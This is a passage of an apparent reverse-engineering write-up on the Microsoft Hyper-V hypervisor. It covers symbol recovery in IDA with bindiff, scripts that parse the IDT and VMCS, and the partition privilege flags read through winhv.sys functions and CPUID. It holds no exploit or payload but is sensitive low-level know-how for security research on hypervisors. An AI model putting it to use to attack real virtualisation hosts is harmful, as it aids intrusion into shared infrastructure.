<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000f0000, Size=0x0000000000010000, Type=WP, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x0000000000100000, Size=0x00000000bff00000, Type=WB, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is worth mentioning that the process of loading a hypervisor in Windows Server 2012 (and higher) differs significantly from Windows Server 2008 R2, where the preparation and launch of the hypervisor directly produced by the hvboot.sys that run after loading the kernel Windows. This activation of the hypervisor instruction vmlaunch performed in the driver hvboot.sys and the next VM exit was processed in the hvix64.exe.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Find symbol information</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When loading hvix64.exe in IDA PRO we get about three thousand functions with names like sub_FFFFF8000XXXXX because Microsoft, unfortunately, does not provide the symbol information for the hypervisor. Facilitate the research of the hypervisor can first try to identify some of the functions without detailed study.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the first place it is worth using bindiff (or diaphora) to compare the files hvix64, hvloader and winload where symbol information are provided. Comparison shows that the networking function (e1000), USB, cryptography and some other features are exactly the same as the ones that are present in winload.exe (in Windows Server 2016 debugging </span><span style="background-color: transparent; color: #222222; font-family: "arial"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">functions have been moved to a separate module</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). This will help set the appointment of 500 functions. The same bindiff allows you to move the names of matching functions from one database to another idb. However, this method should be taken with caution and do not move all fully matched functions. At least the result should be analyzed by Visual comparison graph matching functions (Ctrl + E).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, let's define exception/interrupt functions, which are standard for processor architecture x86. A little script is written in python (ParseIDT.py) to parse the IDT, which must be run in IDA PRO, beeing connected through a debugging module of WinDBG to the hypervisor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the case of ISR was not found, check the tab List of problems in IDA PRO, since these procedures can not be found in the automatic analysis code that IDA performs.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, you can define the exit procedure in VM after reading field values VMCS. This can be done after the procedure fill the VMCS at hvix64.exe or use this script display-vmcs.py, which in the context of the hypervisor reads all fields VMCS and prints their values.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypercall</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Microsoft released document Hypervisor Top-Level Functional Specification: Windows Server 2012 R2 (6), describes the architecture of Hyper-V 4.0. Hypervisor Top-Level Functional Specification for Windows Server 2016 </span><span style="background-color: transparent; color: #222222; font-family: "arial"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">has not yet been published</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Each virtual machine, as well as directly with the OS component installed Hyper-V is presented in terms of the partition (partition). Each section has its own identifier that must be unique to the host server.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For each section are given privileges to create (structure HV_PARTITION_PRIVILEGE_MASK), which determine the ability to perform specific hypercall.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Learn privileges by executing in the root-partition the following code in ring0:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionId(&PartID);//PartID – ID section</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty(PartID,</span><span style="background-color: white; color: darkslategrey; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPartitionPropertyPrivilegeFlags</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,&HvProp);</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the result is returned in HvProp.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPartitionPropertyPrivilegeFlags – one of the enumeration values</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PARTITION_PROPERTY_CODE, which operate functions exported driver winhv.sys.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_ID</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PartitionId,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY_CODE</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyCode,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__out PHV_PARTITION_PROPERTY</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyValue</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also, if necessary, these privileges can be changed, causing root-partition in the following function:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span><br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetPartitionProperty(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_ID</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PartitionId,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY_CODE</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyCode,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyValue</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The value of HvPartitionPropertyPrivilegeFlags for the root partition: 000039FF00001FFF</span></div>
<div dir="ltr" style="margin-left: 22.35pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="246"></col><col width="170"></col><col width="170"></col></colgroup><tbody>
<tr style="height: 165px;"><td style="border: 0px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessVpRunTimeMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessPartitionReferenceCounter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessSynicMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessSyntheticTimerMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessApicMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessHypercallMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessVpIndex</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessResetMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessStatsMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessPartitionReferenceTsc</span></div>
</td><td style="border: 0px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessGuestIdleMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessFrequencyMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessDebugMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CreatePartitions</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessPartitionId</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessMemoryPool</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AdjustMessageBuffers</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PostMessages</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SignalEvents</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CreatePort</span></div>
</td><td style="border: 0px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ConnectPort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessStats</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Debugging</span><span style="background-color: transparent; color: red; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CpuManagement</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ConfigureProfiler</span></div>
</td></tr>
</tbody></table>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The value of HvPartitionPropertyPrivilegeFlags for child partition 000008B000000E7F:</span></div>
<div dir="ltr" style="margin-left: 29.45pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="288"></col><col width="335"></col></colgroup><tbody>
<tr style="height: 119px;"><td style="border: 0px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessVpRunTimeMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessPartitionReferenceCounter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessSynicMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessSyntheticTimerMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessApicMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessHypercallMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessVpIndex</span></div>
</td><td style="border: 0px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessPartitionReferenceTsc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessGuestIdleMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessFrequencyMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PostMessages</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SignalEvents</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ConnectPort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Debugging</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a Windows guest OS, privileges can be obtained by placing EAX 0x40000003 and following the instructions CPUID (in document Hypervisor Functional Specification top-level 4.0 a given interpretation of the results of the cpuid).</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
